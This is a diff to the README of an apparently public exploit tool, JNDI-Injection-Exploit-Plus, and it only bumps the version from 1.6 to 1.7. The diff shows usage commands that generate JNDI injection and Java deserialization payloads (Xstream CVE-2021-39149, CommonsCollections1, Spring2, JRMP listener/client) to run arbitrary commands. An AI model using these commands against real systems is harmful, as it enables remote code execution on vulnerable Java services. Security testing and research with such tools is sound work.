@@ -113,15 +113,15 @@ Xstream | CVE-2021-39149
113113- Example
114114
115115``` shell
116- $ java -jar JNDI-Injection-Exploit-Plus-1.6 -SNAPSHOT-all.jar -C " open -a Calculator" -D Jdk7u21 -W Xstream
116+ $ java -jar JNDI-Injection-Exploit-Plus-1.7 -SNAPSHOT-all.jar -C " open -a Calculator" -D Jdk7u21 -W Xstream
117117```
118118
119119![ ] ( ./img/4.png )
120120
121121#### Web service to return Deserial Gadgets
122122
123123``` shell
124- java -jar JNDI-Injection-Exploit-Plus-1.6 -SNAPSHOT-all.jar
124+ java -jar JNDI-Injection-Exploit-Plus-1.7 -SNAPSHOT-all.jar
125125```
126126
127127``` shell
@@ -141,7 +141,7 @@ P.S. Param wrapper & output is opetional
141141Run as
142142
143143``` shell
144- $ java -jar JNDI-Injection-Exploit-Plus-1.6 -SNAPSHOT-all.jar [-C] [command] [-A] [address]
144+ $ java -jar JNDI-Injection-Exploit-Plus-1.7 -SNAPSHOT-all.jar [-C] [command] [-A] [address]
145145```
146146
147147where:
@@ -171,7 +171,7 @@ Points for attention:
171171Run as
172172
173173``` shell
174- $ java -jar JNDI-Injection-Exploit-Plus-1.6 -SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64/hex]
174+ $ java -jar JNDI-Injection-Exploit-Plus-1.7 -SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64/hex]
175175```
176176
177177where:
@@ -189,13 +189,13 @@ where:
189189- JRMPListener
190190
191191``` shell
192- java -cp JNDI-Injection-Exploit-Plus-1.6 -SNAPSHOT-all.jar exploit.JRMPListener < port> CommonsCollections1 calc
192+ java -cp JNDI-Injection-Exploit-Plus-1.7 -SNAPSHOT-all.jar exploit.JRMPListener < port> CommonsCollections1 calc
193193```
194194
195195- JRMPClient
196196
197197``` shell
198- java -jar JNDI-Injection-Exploit-Plus-1.6 -SNAPSHOT-all.jar -C " <ip>:<port>" -D " JRMPClient" -O base64
198+ java -jar JNDI-Injection-Exploit-Plus-1.7 -SNAPSHOT-all.jar -C " <ip>:<port>" -D " JRMPClient" -O base64
199199```
200200
201201## Examples
@@ -207,7 +207,7 @@ Local demo:
2072071 . Start the tool like this:
208208
209209 ``` shell
210- $ java -jar JNDI-Injection-Exploit-Plus-1.6 -SNAPSHOT-all.jar -C " /System/Applications/Calculator.app/Contents/MacOS/Calculator" -A " 127.0.0.1"
210+ $ java -jar JNDI-Injection-Exploit-Plus-1.7 -SNAPSHOT-all.jar -C " /System/Applications/Calculator.app/Contents/MacOS/Calculator" -A " 127.0.0.1"
211211 ```
212212
213213 Screenshot:
@@ -238,7 +238,7 @@ For More Examples: [Test-JNDI-Injection-Exploit-Plus](https://github.com/cckuail
238238### Deserialization Payloads
239239
240240``` shell
241- $ java -jar JNDI-Injection-Exploit-Plus-1.6 -SNAPSHOT-all.jar -C " /System/Applications/Calculator.app/Contents/MacOS/Calculator" -D " Spring2" -O base64
241+ $ java -jar JNDI-Injection-Exploit-Plus-1.7 -SNAPSHOT-all.jar -C " /System/Applications/Calculator.app/Contents/MacOS/Calculator" -D " Spring2" -O base64
242242```
243243
244244Base64 Output Result:
0 commit comments